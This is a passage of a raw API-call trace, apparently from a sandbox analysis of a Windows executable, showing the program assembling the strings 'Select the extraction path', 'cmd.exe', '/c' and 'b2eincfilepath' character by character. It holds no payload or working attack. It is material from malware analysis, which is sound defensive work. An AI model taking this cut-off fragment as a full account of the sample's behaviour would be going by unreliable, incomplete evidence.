(dwErrCode=0x0) [0075.483] wcslen (_String="Select the extrac") returned 0x11 [0075.483] wcslen (_String="t") returned 0x1 [0075.483] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x2e) returned 0x2a646b8 [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError (dwErrCode=0x0) [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError (dwErrCode=0x0) [0075.483] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError (dwErrCode=0x0) [0075.483] wcslen (_String="Select the extract") returned 0x12 [0075.483] wcslen (_String="i") returned 0x1 [0075.483] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x30) returned 0x2a646b8 [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError (dwErrCode=0x0) [0075.483] GetLastError () returned 0x0 [0075.483] SetLastError (dwErrCode=0x0) [0075.484] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.484] GetLastError () returned 0x0 [0075.484] SetLastError (dwErrCode=0x0) [0075.484] wcslen (_String="Select the extracti") returned 0x13 [0075.484] wcslen (_String="o") returned 0x1 [0075.484] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x32) returned 0x2a646b8 [0075.484] GetLastError () returned 0x0 [0075.484] SetLastError (dwErrCode=0x0) [0075.484] GetLastError () returned 0x0 [0075.484] SetLastError (dwErrCode=0x0) [0075.484] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.484] GetLastError () returned 0x0 [0075.484] SetLastError (dwErrCode=0x0) [0075.484] wcslen (_String="Select the extractio") returned 0x14 [0075.484] wcslen (_String="n") returned 0x1 [0075.484] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x34) returned 0x2a646b8 [0075.484] GetLastError () returned 0x0 [0075.484] SetLastError (dwErrCode=0x0) [0075.484] GetLastError () returned 0x0 [0075.485] SetLastError (dwErrCode=0x0) [0075.485] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.485] GetLastError () returned 0x0 [0075.485] SetLastError (dwErrCode=0x0) [0075.485] wcslen (_String="Select the extraction") returned 0x15 [0075.485] wcslen (_String=" ") returned 0x1 [0075.485] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x36) returned 0x2a646b8 [0075.485] GetLastError () returned 0x0 [0075.485] SetLastError (dwErrCode=0x0) [0075.485] GetLastError () returned 0x0 [0075.485] SetLastError (dwErrCode=0x0) [0075.485] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.485] GetLastError () returned 0x0 [0075.485] SetLastError (dwErrCode=0x0) [0075.485] wcslen (_String="Select the extraction ") returned 0x16 [0075.485] wcslen (_String="p") returned 0x1 [0075.486] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x38) returned 0x2a646b8 [0075.486] GetLastError () returned 0x0 [0075.486] SetLastError (dwErrCode=0x0) [0075.486] GetLastError () returned 0x0 [0075.486] SetLastError (dwErrCode=0x0) [0075.486] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.486] GetLastError () returned 0x0 [0075.486] SetLastError (dwErrCode=0x0) [0075.486] wcslen (_String="Select the extraction p") returned 0x17 [0075.486] wcslen (_String="a") returned 0x1 [0075.486] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x3a) returned 0x2a646b8 [0075.486] GetLastError () returned 0x0 [0075.486] SetLastError (dwErrCode=0x0) [0075.486] GetLastError () returned 0x0 [0075.486] SetLastError (dwErrCode=0x0) [0075.487] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.487] GetLastError () returned 0x0 [0075.487] SetLastError (dwErrCode=0x0) [0075.487] wcslen (_String="Select the extraction pa") returned 0x18 [0075.487] wcslen (_String="t") returned 0x1 [0075.487] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x3c) returned 0x2a646b8 [0075.487] GetLastError () returned 0x0 [0075.487] SetLastError (dwErrCode=0x0) [0075.487] GetLastError () returned 0x0 [0075.487] SetLastError (dwErrCode=0x0) [0075.487] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.487] GetLastError () returned 0x0 [0075.487] SetLastError (dwErrCode=0x0) [0075.487] wcslen (_String="Select the extraction pat") returned 0x19 [0075.487] wcslen (_String="h") returned 0x1 [0075.487] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a646b8, Size=0x3e) returned 0x2a646b8 [0075.487] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.488] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] wcslen (_String="c") returned 0x1 [0075.488] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a64700 [0075.488] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.488] GetLastError () returned 0x0 [0075.488] SetLastError (dwErrCode=0x0) [0075.488] wcslen (_String="c") returned 0x1 [0075.488] wcslen (_String="m") returned 0x1 [0075.489] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64700, Size=0xe) returned 0x2a64700 [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] wcslen (_String="cm") returned 0x2 [0075.489] wcslen (_String="d") returned 0x1 [0075.489] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64700, Size=0x10) returned 0x2a64700 [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] GetLastError () returned 0x0 [0075.489] SetLastError (dwErrCode=0x0) [0075.489] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.490] GetLastError () returned 0x0 [0075.490] SetLastError (dwErrCode=0x0) [0075.490] wcslen (_String=".") returned 0x1 [0075.490] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a64718 [0075.490] GetLastError () returned 0x0 [0075.490] SetLastError (dwErrCode=0x0) [0075.490] GetLastError () returned 0x0 [0075.490] SetLastError (dwErrCode=0x0) [0075.490] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.490] GetLastError () returned 0x0 [0075.490] SetLastError (dwErrCode=0x0) [0075.490] wcslen (_String=".") returned 0x1 [0075.490] wcslen (_String="e") returned 0x1 [0075.490] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64718, Size=0xe) returned 0x2a64718 [0075.490] GetLastError () returned 0x0 [0075.490] SetLastError (dwErrCode=0x0) [0075.490] GetLastError () returned 0x0 [0075.491] SetLastError (dwErrCode=0x0) [0075.491] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.491] GetLastError () returned 0x0 [0075.491] SetLastError (dwErrCode=0x0) [0075.491] wcslen (_String=".e") returned 0x2 [0075.491] wcslen (_String="x") returned 0x1 [0075.491] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64718, Size=0x10) returned 0x2a64718 [0075.491] GetLastError () returned 0x0 [0075.491] SetLastError (dwErrCode=0x0) [0075.491] GetLastError () returned 0x0 [0075.491] SetLastError (dwErrCode=0x0) [0075.491] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.491] GetLastError () returned 0x0 [0075.491] SetLastError (dwErrCode=0x0) [0075.491] wcslen (_String=".ex") returned 0x3 [0075.491] wcslen (_String="e") returned 0x1 [0075.492] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64718, Size=0x12) returned 0x2a64718 [0075.492] GetLastError () returned 0x0 [0075.492] SetLastError (dwErrCode=0x0) [0075.492] GetLastError () returned 0x0 [0075.492] SetLastError (dwErrCode=0x0) [0075.492] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.492] GetLastError () returned 0x0 [0075.492] SetLastError (dwErrCode=0x0) [0075.492] wcslen (_String="/") returned 0x1 [0075.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a64738 [0075.492] GetLastError () returned 0x0 [0075.492] SetLastError (dwErrCode=0x0) [0075.492] GetLastError () returned 0x0 [0075.492] SetLastError (dwErrCode=0x0) [0075.492] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.492] GetLastError () returned 0x0 [0075.493] SetLastError (dwErrCode=0x0) [0075.493] wcslen (_String="/") returned 0x1 [0075.493] wcslen (_String="c") returned 0x1 [0075.493] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64738, Size=0xe) returned 0x2a64738 [0075.493] GetLastError () returned 0x0 [0075.493] SetLastError (dwErrCode=0x0) [0075.493] GetLastError () returned 0x0 [0075.493] SetLastError (dwErrCode=0x0) [0075.493] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.493] GetLastError () returned 0x0 [0075.493] SetLastError (dwErrCode=0x0) [0075.493] wcslen (_String="b") returned 0x1 [0075.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a604a0 [0075.495] GetLastError () returned 0x0 [0075.495] SetLastError (dwErrCode=0x0) [0075.495] GetLastError () returned 0x0 [0075.495] SetLastError (dwErrCode=0x0) [0075.495] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.495] GetLastError () returned 0x0 [0075.495] SetLastError (dwErrCode=0x0) [0075.495] wcslen (_String="b") returned 0x1 [0075.495] wcslen (_String="2") returned 0x1 [0075.495] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0xe) returned 0x2a604a0 [0075.495] GetLastError () returned 0x0 [0075.495] SetLastError (dwErrCode=0x0) [0075.495] GetLastError () returned 0x0 [0075.495] SetLastError (dwErrCode=0x0) [0075.495] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.495] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] wcslen (_String="b2") returned 0x2 [0075.496] wcslen (_String="e") returned 0x1 [0075.496] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x10) returned 0x2a604a0 [0075.496] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.496] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] wcslen (_String="b2e") returned 0x3 [0075.496] wcslen (_String="i") returned 0x1 [0075.496] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x12) returned 0x2a604a0 [0075.496] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] GetLastError () returned 0x0 [0075.496] SetLastError (dwErrCode=0x0) [0075.496] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.497] wcslen (_String="b2ei") returned 0x4 [0075.497] wcslen (_String="n") returned 0x1 [0075.497] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x14) returned 0x2a604a0 [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.497] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.497] wcslen (_String="b2ein") returned 0x5 [0075.497] wcslen (_String="c") returned 0x1 [0075.497] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x16) returned 0x2a604a0 [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.497] GetLastError () returned 0x0 [0075.497] SetLastError (dwErrCode=0x0) [0075.498] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.498] GetLastError () returned 0x0 [0075.498] SetLastError (dwErrCode=0x0) [0075.498] wcslen (_String="b2einc") returned 0x6 [0075.498] wcslen (_String="f") returned 0x1 [0075.498] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x18) returned 0x2a604a0 [0075.498] GetLastError () returned 0x0 [0075.498] SetLastError (dwErrCode=0x0) [0075.498] GetLastError () returned 0x0 [0075.498] SetLastError (dwErrCode=0x0) [0075.498] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.498] GetLastError () returned 0x0 [0075.579] SetLastError (dwErrCode=0x0) [0075.579] wcslen (_String="b2eincf") returned 0x7 [0075.579] wcslen (_String="i") returned 0x1 [0075.579] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x1a) returned 0x2a604a0 [0075.579] GetLastError () returned 0x0 [0075.579] SetLastError (dwErrCode=0x0) [0075.579] GetLastError () returned 0x0 [0075.579] SetLastError (dwErrCode=0x0) [0075.579] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.579] GetLastError () returned 0x0 [0075.579] SetLastError (dwErrCode=0x0) [0075.579] wcslen (_String="b2eincfi") returned 0x8 [0075.579] wcslen (_String="l") returned 0x1 [0075.579] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x1c) returned 0x2a604a0 [0075.579] GetLastError () returned 0x0 [0075.579] SetLastError (dwErrCode=0x0) [0075.579] GetLastError () returned 0x0 [0075.580] SetLastError (dwErrCode=0x0) [0075.580] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.580] GetLastError () returned 0x0 [0075.580] SetLastError (dwErrCode=0x0) [0075.580] wcslen (_String="b2eincfil") returned 0x9 [0075.580] wcslen (_String="e") returned 0x1 [0075.580] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x1e) returned 0x2a604a0 [0075.580] GetLastError () returned 0x0 [0075.580] SetLastError (dwErrCode=0x0) [0075.580] GetLastError () returned 0x0 [0075.580] SetLastError (dwErrCode=0x0) [0075.580] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.580] GetLastError () returned 0x0 [0075.580] SetLastError (dwErrCode=0x0) [0075.580] wcslen (_String="b2eincfile") returned 0xa [0075.580] wcslen (_String="p") returned 0x1 [0075.581] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x20) returned 0x2a604a0 [0075.581] GetLastError () returned 0x0 [0075.581] SetLastError (dwErrCode=0x0) [0075.581] GetLastError () returned 0x0 [0075.581] SetLastError (dwErrCode=0x0) [0075.581] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.581] GetLastError () returned 0x0 [0075.581] SetLastError (dwErrCode=0x0) [0075.581] wcslen (_String="b2eincfilep") returned 0xb [0075.581] wcslen (_String="a") returned 0x1 [0075.581] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x22) returned 0x2a604a0 [0075.581] GetLastError () returned 0x0 [0075.581] SetLastError (dwErrCode=0x0) [0075.581] GetLastError () returned 0x0 [0075.582] SetLastError (dwErrCode=0x0) [0075.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.582] GetLastError () returned 0x0 [0075.582] SetLastError (dwErrCode=0x0) [0075.582] wcslen (_String="b2eincfilepa") returned 0xc [0075.582] wcslen (_String="t") returned 0x1 [0075.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x24) returned 0x2a604a0 [0075.582] GetLastError () returned 0x0 [0075.582] SetLastError (dwErrCode=0x0) [0075.582] GetLastError () returned 0x0 [0075.582] SetLastError (dwErrCode=0x0) [0075.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.582] GetLastError () returned 0x0 [0075.582] SetLastError (dwErrCode=0x0) [0075.582] wcslen (_String="b2eincfilepat") returned 0xd [0075.582] wcslen (_String="h") returned 0x1 [0075.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604a0, Size=0x26) returned 0x2a604a0 [0075.582] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.583] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] wcslen (_String="b") returned 0x1 [0075.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a677e0 [0075.583] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.583] GetLastError () returned 0x0 [0075.583] SetLastError (dwErrCode=0x0) [0075.583] wcslen (_String="b") returned 0x1 [0075.583] wcslen (_String="2") returned 0x1 [0075.583] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677e0, Size=0xe) returned 0x2a67750 [0075.583] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.584] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] wcslen (_String="b2") returned 0x2 [0075.584] wcslen (_String="e") returned 0x1 [0075.584] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67750, Size=0x10) returned 0x2a676c0 [0075.584] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.584] GetLastError () returned 0x0 [0075.584] SetLastError (dwErrCode=0x0) [0075.584] wcslen (_String="b2e") returned 0x3 [0075.584] wcslen (_String="i") returned 0x1 [0075.584] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676c0, Size=0x12) returned 0x2a604d0 [0075.585] GetLastError () returned 0x0 [0075.585] SetLastError (dwErrCode=0x0) [0075.585] GetLastError () returned 0x0 [0075.585] SetLastError (dwErrCode=0x0) [0075.585] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.585] GetLastError () returned 0x0 [0075.585] SetLastError (dwErrCode=0x0) [0075.585] wcslen (_String="b2ei") returned 0x4 [0075.585] wcslen (_String="n") returned 0x1 [0075.585] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x14) returned 0x2a604d0 [0075.585] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] wcslen (_String="b2ein") returned 0x5 [0075.586] wcslen (_String="c") returned 0x1 [0075.586] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x16) returned 0x2a604d0 [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] GetLastError () returned 0x0 [0075.586] SetLastError (dwErrCode=0x0) [0075.586] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.587] wcslen (_String="b2einc") returned 0x6 [0075.587] wcslen (_String="f") returned 0x1 [0075.587] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x18) returned 0x2a604d0 [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.587] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.587] wcslen (_String="b2eincf") returned 0x7 [0075.587] wcslen (_String="i") returned 0x1 [0075.587] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x1a) returned 0x2a604d0 [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.587] GetLastError () returned 0x0 [0075.587] SetLastError (dwErrCode=0x0) [0075.588] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.588] GetLastError () returned 0x0 [0075.588] SetLastError (dwErrCode=0x0) [0075.588] wcslen (_String="b2eincfi") returned 0x8 [0075.588] wcslen (_String="l") returned 0x1 [0075.588] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x1c) returned 0x2a604d0 [0075.588] GetLastError () returned 0x0 [0075.588] SetLastError (dwErrCode=0x0) [0075.588] GetLastError () returned 0x0 [0075.588] SetLastError (dwErrCode=0x0) [0075.588] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.588] GetLastError () returned 0x0 [0075.588] SetLastError (dwErrCode=0x0) [0075.588] wcslen (_String="b2eincfil") returned 0x9 [0075.588] wcslen (_String="e") returned 0x1 [0075.588] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x1e) returned 0x2a604d0 [0075.588] GetLastError () returned 0x0 [0075.588] SetLastError (dwErrCode=0x0) [0075.588] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.589] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.589] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.589] wcslen (_String="b2eincfile") returned 0xa [0075.589] wcslen (_String="c") returned 0x1 [0075.589] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x20) returned 0x2a604d0 [0075.589] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.589] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.589] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.589] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.589] wcslen (_String="b2eincfilec") returned 0xb [0075.589] wcslen (_String="o") returned 0x1 [0075.589] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x22) returned 0x2a604d0 [0075.589] GetLastError () returned 0x0 [0075.589] SetLastError (dwErrCode=0x0) [0075.590] GetLastError () returned 0x0 [0075.590] SetLastError (dwErrCode=0x0) [0075.590] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.590] GetLastError () returned 0x0 [0075.590] SetLastError (dwErrCode=0x0) [0075.590] wcslen (_String="b2eincfileco") returned 0xc [0075.590] wcslen (_String="u") returned 0x1 [0075.590] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x24) returned 0x2a604d0 [0075.590] GetLastError () returned 0x0 [0075.590] SetLastError (dwErrCode=0x0) [0075.590] GetLastError () returned 0x0 [0075.590] SetLastError (dwErrCode=0x0) [0075.590] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.590] GetLastError () returned 0x0 [0075.590] SetLastError (dwErrCode=0x0) [0075.590] wcslen (_String="b2eincfilecou") returned 0xd [0075.590] wcslen (_String="n") returned 0x1 [0075.590] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x26) returned 0x2a604d0 [0075.590] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.591] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] wcslen (_String="b2eincfilecoun") returned 0xe [0075.591] wcslen (_String="t") returned 0x1 [0075.591] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a604d0, Size=0x28) returned 0x2a604d0 [0075.591] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.591] GetLastError () returned 0x0 [0075.591] SetLastError (dwErrCode=0x0) [0075.591] wcslen (_String="b") returned 0x1 [0075.591] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a676f0 [0075.592] GetLastError () returned 0x0 [0075.592] SetLastError (dwErrCode=0x0) [0075.592] GetLastError () returned 0x0 [0075.592] SetLastError (dwErrCode=0x0) [0075.592] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 0x2a605c0 [0075.592] GetLastError () returned 0x0 [0075.592] SetLastError (dwErrCode=0x0) [0075.592] wcslen (_String="b") returned 0x1 [0075.592] wcslen (_String="2") returned 0x1 [0075.593] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676f0, Size=0xe) returned 0x2a676a8 [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] GetLastError () returned 0x0 [0075.593] SetLastError (dwErrCode=0x0) [0075.593] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0xc) returned 